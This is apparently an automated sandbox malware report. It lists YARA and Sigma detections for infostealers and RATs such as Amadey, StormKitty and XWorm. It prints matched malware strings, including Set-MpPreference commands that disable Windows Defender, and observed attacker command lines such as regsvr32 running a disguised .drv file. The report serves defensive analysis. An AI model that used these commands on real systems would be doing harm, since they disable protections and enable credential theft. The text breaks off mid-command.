00000007.00000002.4519656508.0000000000FB1000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.2134956799.000000000171D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000000.2747691872.0000000000D52000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.2984332143.0000000004179000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000003.2679341193.0000000004A10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000005.00000003.2301189686.0000000004930000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: DbCMTMgeJo.exe PID: 3812	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: DbCMTMgeJo.exe PID: 3812	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: DbCMTMgeJo.exe PID: 3812	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe PID: 6056	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe PID: 6056	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: Avoiding.com PID: 2696	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: regsvr32.exe PID: 6404	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: regsvr32.exe PID: 6404	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: regsvr32.exe PID: 6404	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: regsvr32.exe PID: 6404	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
Process Memory Space: regsvr32.exe PID: 6404	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
Process Memory Space: regsvr32.exe PID: 6404	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 47 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
34.2.regsvr32.exe.64ca5e.0.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
34.2.regsvr32.exe.64ca5e.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
34.2.regsvr32.exe.64ca5e.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
34.2.regsvr32.exe.64ca5e.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x7702:$str01: $VB$Local_Port 0x76f3:$str02: $VB$Local_Host 0x79b1:$str03: get_Jpeg 0x7449:$str04: get_ServicePack 0x8877:$str05: Select * from AntivirusProduct 0x8a75:$str06: PCRestart 0x8a89:$str07: shutdown.exe /f /r /t 0 0x8b3b:$str08: StopReport 0x8b11:$str09: StopDDos 0x8c07:$str10: sendPlugin 0x8da5:$str12: -ExecutionPolicy Bypass -File " 0x8eca:$str13: Content-length: 5235
34.2.regsvr32.exe.64ca5e.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8787:$s6: VirtualBox 0x86e5:$s8: Win32_ComputerSystem 0x9289:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9326:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x943b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8de5:$cnc4: POST / HTTP/1.1
34.2.regsvr32.exe.1c730000.6.raw.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x4811:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x4891:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4916:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6a9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6b59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6bd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6da1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4daf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true 0x4e67:$s2: Set-MpPreference -DisableArchiveScanning $true 0x4f07:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x4fa5:$s4: Set-MpPreference -DisableScriptScanning $true 0x502f:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x509d:$s6: Set-MpPreference -MAPSReporting 0 0x5115:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x51b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x5241:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x52cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6 0x5422:$e2: Add-MpPreference -ExclusionPath
34.2.regsvr32.exe.2310000.2.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
34.2.regsvr32.exe.2310000.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
34.2.regsvr32.exe.2310000.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
34.2.regsvr32.exe.2310000.2.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x7702:$str01: $VB$Local_Port 0x76f3:$str02: $VB$Local_Host 0x79b1:$str03: get_Jpeg 0x7449:$str04: get_ServicePack 0x8877:$str05: Select * from AntivirusProduct 0x8a75:$str06: PCRestart 0x8a89:$str07: shutdown.exe /f /r /t 0 0x8b3b:$str08: StopReport 0x8b11:$str09: StopDDos 0x8c07:$str10: sendPlugin 0x8da5:$str12: -ExecutionPolicy Bypass -File " 0x8eca:$str13: Content-length: 5235
34.2.regsvr32.exe.2310000.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8787:$s6: VirtualBox 0x86e5:$s8: Win32_ComputerSystem 0x9289:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9326:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x943b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8de5:$cnc4: POST / HTTP/1.1
34.2.regsvr32.exe.211131e.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
34.2.regsvr32.exe.211131e.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
34.2.regsvr32.exe.211131e.1.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5902:$str01: $VB$Local_Port 0x58f3:$str02: $VB$Local_Host 0x5bb1:$str03: get_Jpeg 0x5649:$str04: get_ServicePack 0x6a77:$str05: Select * from AntivirusProduct 0x6c75:$str06: PCRestart 0x6c89:$str07: shutdown.exe /f /r /t 0 0x6d3b:$str08: StopReport 0x6d11:$str09: StopDDos 0x6e07:$str10: sendPlugin 0x6fa5:$str12: -ExecutionPolicy Bypass -File " 0x70ca:$str13: Content-length: 5235
34.2.regsvr32.exe.211131e.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6987:$s6: VirtualBox 0x68e5:$s8: Win32_ComputerSystem 0x7489:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7526:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x763b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6fe5:$cnc4: POST / HTTP/1.1
34.2.regsvr32.exe.2310000.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
34.2.regsvr32.exe.2310000.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
34.2.regsvr32.exe.2310000.2.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5902:$str01: $VB$Local_Port 0x58f3:$str02: $VB$Local_Host 0x5bb1:$str03: get_Jpeg 0x5649:$str04: get_ServicePack 0x6a77:$str05: Select * from AntivirusProduct 0x6c75:$str06: PCRestart 0x6c89:$str07: shutdown.exe /f /r /t 0 0x6d3b:$str08: StopReport 0x6d11:$str09: StopDDos 0x6e07:$str10: sendPlugin 0x6fa5:$str12: -ExecutionPolicy Bypass -File " 0x70ca:$str13: Content-length: 5235
34.2.regsvr32.exe.2310000.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6987:$s6: VirtualBox 0x68e5:$s8: Win32_ComputerSystem 0x7489:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7526:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x763b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6fe5:$cnc4: POST / HTTP/1.1
34.2.regsvr32.exe.211131e.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
34.2.regsvr32.exe.211131e.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
34.2.regsvr32.exe.211131e.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
34.2.regsvr32.exe.211131e.1.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x7702:$str01: $VB$Local_Port 0x76f3:$str02: $VB$Local_Host 0x79b1:$str03: get_Jpeg 0x7449:$str04: get_ServicePack 0x8877:$str05: Select * from AntivirusProduct 0x8a75:$str06: PCRestart 0x8a89:$str07: shutdown.exe /f /r /t 0 0x8b3b:$str08: StopReport 0x8b11:$str09: StopDDos 0x8c07:$str10: sendPlugin 0x8da5:$str12: -ExecutionPolicy Bypass -File " 0x8eca:$str13: Content-length: 5235
34.2.regsvr32.exe.211131e.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8787:$s6: VirtualBox 0x86e5:$s8: Win32_ComputerSystem 0x9289:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9326:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x943b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8de5:$cnc4: POST / HTTP/1.1
34.2.regsvr32.exe.1c730000.6.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x2a11:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x2a91:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x2b16:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4c9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4d59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4dd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4fa1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x2faf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true 0x3067:$s2: Set-MpPreference -DisableArchiveScanning $true 0x3107:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x31a5:$s4: Set-MpPreference -DisableScriptScanning $true 0x322f:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x329d:$s6: Set-MpPreference -MAPSReporting 0 0x3315:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x33b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x3441:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x34cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6 0x3622:$e2: Add-MpPreference -ExclusionPath
8.2.c153ad0ce0.exe.4179550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.2.regsvr32.exe.1c580000.5.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
34.2.regsvr32.exe.1c580000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
34.2.regsvr32.exe.1c580000.5.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
34.2.regsvr32.exe.1c580000.5.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x675db:$sk01: LimerBoy/StormKitty 0x7b2e7:$str01: set_sUsername 0x7b2a5:$str03: set_sExpMonth 0x7b115:$str04: WritePasswords 0x7b0de:$str05: WriteCookies 0x722aa:$str06: sChromiumPswPaths 0x722bc:$str07: sGeckoBrowserPaths 0x9591b:$str10: encrypted_key":"(.*?)"
34.2.regsvr32.exe.1c580000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x93e40:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x93eb2:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x93f3c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x93fce:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x94038:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x940aa:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x94140:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x941d0:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
46.2.5ec73896e9.exe.34f9588.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.c153ad0ce0.exe.4179550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.2.regsvr32.exe.64ca5e.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
34.2.regsvr32.exe.64ca5e.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
34.2.regsvr32.exe.64ca5e.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5902:$str01: $VB$Local_Port 0x58f3:$str02: $VB$Local_Host 0x5bb1:$str03: get_Jpeg 0x5649:$str04: get_ServicePack 0x6a77:$str05: Select * from AntivirusProduct 0x6c75:$str06: PCRestart 0x6c89:$str07: shutdown.exe /f /r /t 0 0x6d3b:$str08: StopReport 0x6d11:$str09: StopDDos 0x6e07:$str10: sendPlugin 0x6fa5:$str12: -ExecutionPolicy Bypass -File " 0x70ca:$str13: Content-length: 5235
34.2.regsvr32.exe.64ca5e.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6987:$s6: VirtualBox 0x68e5:$s8: Win32_ComputerSystem 0x7489:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7526:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x763b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6fe5:$cnc4: POST / HTTP/1.1
8.0.c153ad0ce0.exe.d50000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.2.regsvr32.exe.1c580000.5.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
34.2.regsvr32.exe.1c580000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
34.2.regsvr32.exe.1c580000.5.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
34.2.regsvr32.exe.1c580000.5.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x657db:$sk01: LimerBoy/StormKitty 0x794e7:$str01: set_sUsername 0x794a5:$str03: set_sExpMonth 0x79315:$str04: WritePasswords 0x792de:$str05: WriteCookies 0x704aa:$str06: sChromiumPswPaths 0x704bc:$str07: sGeckoBrowserPaths 0x93b1b:$str10: encrypted_key":"(.*?)"
34.2.regsvr32.exe.1c580000.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x92040:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x920b2:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x9213c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x921ce:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x92238:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x922aa:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x92340:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x923d0:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.skotes.exe.fb0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
4.2.EUONBTH0X1WAZ900JF4PYRKDM.exe.120000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
5.2.skotes.exe.fb0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 41 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\regsvr32.exe, ProcessId: 6404, TargetFilename: C:\Users\user\AppData\Local\dllhost.exe

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Source: Process started

Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 6404, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", ProcessId: 4028, ProcessName: powershell.exe

Sigma detected: DNS Query Request By Regsvr32.EXE

Source: DNS query

Author: Dmitriy Lifanov, oscd.community: Data: Image: C:\Windows\System32\regsvr32.exe, QueryName: m.adnxs.com

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gaqlxgdr\gaqlxgdr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gaqlxgdr\gaqlxgdr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe, ParentProcessId: 2472, ParentProcessName: 5ec73896e9.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gaqlxgdr\gaqlxgdr.cmdline", ProcessId: 2820, ProcessName: csc.exe

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Source: Network Connection

Author: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 208.95.112.1, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 6404, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 54889

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", CommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp" /SL5="$80484,1104885,161792,C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe" /VERYSILENT, ParentImage: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp, ParentProcessId: 6800, ParentProcessName: 21aaa725bd.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ProcessId: 6552, ProcessName: regsvr32.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe, ParentProcessId: 2624, ParentProcessName: 63460ff8c7.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd, ProcessId: 6044, ProcessName: cmd.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe, ProcessId: 2472, TargetFilename: C:\Users\user\AppData\Local\Temp\gaqlxgdr\gaqlxgdr.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 6404, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", ProcessId: 4028, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 4324, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gaqlxgdr\gaqlxgdr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gaqlxgdr\gaqlxgdr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe, ParentProcessId: 2472, ParentProcessName: 5ec73896e9.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gaqlxgdr\gaqlxgdr.cmdline", ProcessId: 2820, ProcessName: csc.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Powershell launch regsvr32

Source: Process started

Author: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 6404, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S 